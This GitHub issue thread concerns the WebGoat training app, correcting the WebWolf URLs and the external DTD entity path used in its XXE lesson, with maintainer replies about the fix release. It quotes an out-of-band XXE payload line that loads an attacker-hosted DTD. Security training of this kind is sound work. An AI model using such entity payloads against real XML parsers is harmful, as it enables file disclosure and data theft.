### ISSUE TITLE
webgoat 8.0.0.M21 - Multiple Problems

### ISSUE THREAD

**Issue by briane92** [WebGoat/WebGoat#545]
The lesson says to create an host file called attack.dtd with an url 

> http://127.0.0.1:9090/WebWolf/landing

This should instead be 

> http://127.0.0.1:9090/landing

`<!ENTITY % remote SYSTEM "http://127.0.0.1:9090/WebWolf/files/attack.dtd">`
should actually be 

`<!ENTITY % remote SYSTEM "http://127.0.0.1:9090//files/{username}/attack.dtd">`

where username is the webwolf username. 

When following the directions properly, its says WebWolf will show the following:
![image](https://user-images.githubusercontent.com/1594620/51080334-a24fd080-16a7-11e9-839d-488291c96136.png)

but the path will actually be "/landing".

**Comment by nbaars** [comment]
@briane92 thanks for reporting I've updated the asciidoc macro, the links are now generated correctly
Will be part of M22

**Comment by nbaars** [comment]
Version M23 has been released
